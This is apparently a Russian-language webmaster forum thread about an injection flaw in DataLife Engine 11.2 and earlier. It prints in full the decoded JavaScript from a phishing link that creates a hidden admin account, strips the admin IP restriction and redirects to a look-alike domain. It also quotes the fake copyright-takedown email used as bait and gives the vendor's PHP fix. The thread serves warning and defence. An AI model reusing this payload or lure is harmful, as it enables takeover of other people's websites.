Уязвимость dle 11.2 и ниже недостаточная фильтрация данных

отправил в личку!

это стандартный, я дополнительно использую сторонний антивирус, который блочит все инъекции самостоятельно, и вообще много функций у него

 

он никому не поможет у тех кто поменял пол движка

у меня вообще всё переписано почти - сделал так же как создатели - взял и переделал

 

кому интересно вот код из закодированной ссылки

Спойлер

Код:

"></a>

<code style='display: none;' id='LJKwqoiDHqewE'></code>
<script>
function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="[email protected]";
var objhttp=A();
objhttp.onreadystatechange = function() 
{
    if (objhttp.readyState == 4) 
    {
        var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ=='));
        var da=r.exec(objhttp.responseText)[2];
        r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp'));
        var dh=r.exec(objhttp.responseText)[2];
        objhttp.open("POST",rp+da+'?mod=editusers&action=list',true);
        objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
        objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1');
        var objhttp2=A();
        objhttp2.onreadystatechange=function()
        {
            if(objhttp2.readyState==4)
            {
                var sd=document.getElementById('LJKwqoiDHqewE');
                sd.innerHTML=objhttp2.responseText.replace(/(<script)/i,'');
                var ael=sd.getElementsByTagName('*');
                var pd='';
                r=new RegExp(atob('XihzYXZlX2Nvbik='));
                for(var i=0;i<ael.length;i++)
                    if(r.test(ael[i].name))
                        pd=pd+ael[i].name+'='+encodeURIComponent(ael[i].value)+'&';
                pd=pd+'save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash='+dh;
                var objhttp3=A();
                objhttp3.open('POST',rp+da+'?mod=options&action=syscon',true);
                objhttp3.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                objhttp3.send(pd);
                window.location.href = "http://g00gleapis.ru/81NJLH";
            }
        }
        objhttp2.open('GET',rp+da+'?mod=options&action=syscon',true);
        objhttp2.send(null);
    }

}
objhttp.open('GET', rp, true);
objhttp.send(null);
</script><a href="http://g00gleapis.ru/81NJLH

 

код примитивный я про js именно, а вот в пхп чувак покопался что бы найти к чему прицепится. Тут ума сильно не надо было, особенно после того как в дле правили уязвимость с фильтрацией можно было предположить что есть еще дыры такие же.

 

а это чем опасна если отложит ремонт файла ?

 

Только вчера прочитал эту тему, и тему с сылкой на дле форум которую Zivler выше кинул где типа ломанули и на тебе, сегодня приходит такая же херь.

Уважаемая администрация веб сайта ***.com,
Материалы, принадлежащие нашему клиенту, размещены на Вашем сайте. Клиент разрешения на их публикацию на указанном веб ресурсе не давал. Существуют основания для запрета клиентом к распространению в сети данных файлов, а также основания, в случае отказа удаления, признания соответствующих действий компрометирующими. Просим удалить материалы в течение 3-х рабочих дней со дня получения данного письма. Данное письмо просим считать официальным электронным уведомлением*, которое является зарегистрированным в соответствующей электронной базе t&p, заверено электронной подписью и может быть использовано t&p в качестве аргумента в случае возникновения дополнительных разбирательств.

Ссылка на материал
_________
*зафиксирован t&p как официальное средство уведомления состоянием на 22 марта 2017 года

С уважением, Екатерина Стрельцова
Ведущий специалист t&p
tokarevpartners.ru
Regards, Kate Stleltzova

 

Это не просто абуза, каких миллион приходит. Такой месседж мне пришел именно на почту. В этом сообщении есть ссылка на материал. При клике начинает исполняться скрипт, злоумышленник получает права админа и начинат чудить. Выше кидали ссылку на форум ДЛЕ, где чел подробно рассказывает как его точно так ломанули. А написал я это, потому что через день после того как я прочитал эту тему, мне пришла аналогичная херь. Еслиб не прочитал, может на автомате бы и кликнул по вредоссылке=)

 

На dle-news обновился пост по поводу уязвимости

https://dle-news.ru/bags/v112/1715-nedostatochnaya-filtraciya-dannyh.html

Далее откройте файл: /engine/ajax/typograf.php и найдите:

PHP:

$txt = trim( convert_unicode( $_POST['txt'], $config['charset'] ) );

ниже добавьте:

PHP:

require_once ENGINE_DIR . '/classes/parse.class.php';
$parse = new ParseFilter();
$txt = $parse->process( $txt );
$txt = preg_replace( "/javascript:/i", "jаvascript:", $txt );
$txt = preg_replace( "/data:/i", "dаta:", $txt );

 

У меня данный фикс стоит, но всё равно пришло сообщение. Правда, без ссылки. Видимо, этот фикс и спас

 

Пришло только что

 

Я так думаю спам.
Мне также приходило Сообщение но я не живу в россии! Не действует РФ Законы

 

Вот здесь Ųnd3rgr0unȡ — Нет никакой безопасности. И как только ты это понимаешь, весь мир перед тобой на блюде.. начали собирать более менее актуальные уязвимости DLE.